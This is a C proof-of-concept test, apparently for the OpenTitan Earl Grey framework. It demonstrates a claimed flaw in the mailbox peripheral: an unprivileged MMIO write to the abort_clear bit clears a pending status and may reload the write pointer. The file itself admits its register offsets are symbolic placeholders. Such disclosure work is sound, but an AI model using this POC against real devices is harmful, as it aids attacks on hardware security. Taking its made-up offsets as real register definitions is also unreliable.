#include "sw/device/lib/testing/test_framework/check.h"
#include "sw/device/lib/testing/test_framework/ottf_main.h"
#include "sw/device/lib/runtime/log.h"
#include "sw/device/lib/base/mmio.h"
#include "sw/device/lib/base/abs_mmio.h"
#include "sw/device/lib/base/bitfield.h"
#include "sw/device/lib/base/memory.h"

// Autogenerated top-level base addresses and register header for MBX
#include "mbx_regs.h"
#include "top_earlgrey.h"

OTTF_DEFINE_TEST_CONFIG();

// NOTE: The real register offsets are defined in the autogenerated
// mbx_regs.h. For the purpose of this POC we use symbolic offsets
// that map to the control/status registers used by the RTL signals
// discussed in the vulnerability report.
// These constants should match the real hardware register layout.
#define MBX_CTRL_REG_OFFSET           0x0
#define MBX_STATUS_REG_OFFSET         0x4
#define MBX_SRAM_WRITE_GNT_OFFSET     0x8
#define MBX_WRITE_PTR_OFFSET          0x0C

// Bit positions inside the registers (symbolic; align to real hw defs).
#define MBX_CTRL_ABORT_CLEAR_BIT      0
#define MBX_STATUS_PENDING_BIT        0

bool test_main(void) {
  // Create an MMIO region for the MBX peripheral using the autogenerated
  // top-level base address. This depends on the BUILD file providing
  // the autogen top_earlgrey constants.
  mmio_region_t mbx = mmio_region_from_addr(TOP_EARLGREY_MBX_BASE_ADDR(MBX));

  LOG_INFO("MBX vuln POC start");

  // Step 1: Ensure a pending condition exists (simulate an inbound pending)
  // We write the status pending bit directly so we can prove that a later
  // abort_clear write will clear it without proper authorization.
  uint32_t status_val = (1u << MBX_STATUS_PENDING_BIT);
  mmio_region_write32(mbx, MBX_STATUS_REG_OFFSET, status_val);
  LOG_INFO("Wrote STATUS.pending = 1 (simulated)");

  // Verify pending is set
  uint32_t read_status = mmio_region_read32(mbx, MBX_STATUS_REG_OFFSET);
  CHECK(bitfield_bit32_read(read_status, MBX_STATUS_PENDING_BIT), "Failed to set pending");

  // Step 2: Unprivileged write to the abort_clear control bit using abs_mmio
  // This models an MMIO writer toggling the hostif_control_abort_clear_i
  // input that the RTL treats as privileged.
  uintptr_t ctrl_addr = (uintptr_t)TOP_EARLGREY_MBX_BASE_ADDR(MBX) + MBX_CTRL_REG_OFFSET;
  uint32_t ctrl_value = (1u << MBX_CTRL_ABORT_CLEAR_BIT);

  LOG_INFO("Performing unprivileged write to hostif_control_abort_clear_i (abs_mmio)");
  // Use abs_mmio to mimic a direct MMIO write (low-level access).
  abs_mmio_write32((uint32_t)ctrl_addr, ctrl_value);

  // Step 3: Read back status and show that pending was cleared solely by the
  // abort_clear write. According to the RTL, clear_pending =
  // hostif_sram_write_gnt_i | hostif_control_abort_clear_i.
  // This demonstrates improper gating: an unprivileged writer cleared pending.
  read_status = mmio_region_read32(mbx, MBX_STATUS_REG_OFFSET);
  bool pending_cleared = !bitfield_bit32_read(read_status, MBX_STATUS_PENDING_BIT);

  LOG_INFO("Status after abort_clear write: 0x%08x", read_status);
  CHECK(pending_cleared, "abort_clear write did NOT clear pending (POC failed)");

  LOG_INFO("POC step: abort_clear successfully cleared pending (unauthenticated)");

  // Additional demonstration: show that writing abort_clear can impact the
  // write pointer load semantics. The RTL uses:
  // load_write_ptr = mbx_empty | host_clear_abort | mbx_read;
  // When host_clear_abort (hostif_control_abort_clear_i & mbx_sys_abort)
  // is asserted, the write pointer may be reloaded. We simulate this by
  // observing the write pointer before/after the abort_clear write.
  uint32_t wp_before = mmio_region_read32(mbx, MBX_WRITE_PTR_OFFSET);
  LOG_INFO("Write pointer before abort_clear: 0x%08x", wp_before);

  // Toggle the control bit again to force potential reload behavior.
  abs_mmio_write32((uint32_t)ctrl_addr, ctrl_value);
  uint32_t wp_after = mmio_region_read32(mbx, MBX_WRITE_PTR_OFFSET);
  LOG_INFO("Write pointer after abort_clear: 0x%08x", wp_after);

  // If the RTL reloads the pointer on abort_clear and an external abort
  // condition (mbx_sys_abort) is present, wp_after may differ from wp_before.
  // We don't assert a specific change here because exact semantics depend on
  // mbx_sys_abort being active, but we log the observation for manual review.

  LOG_INFO("MBX vuln POC completed");
  return true;
}
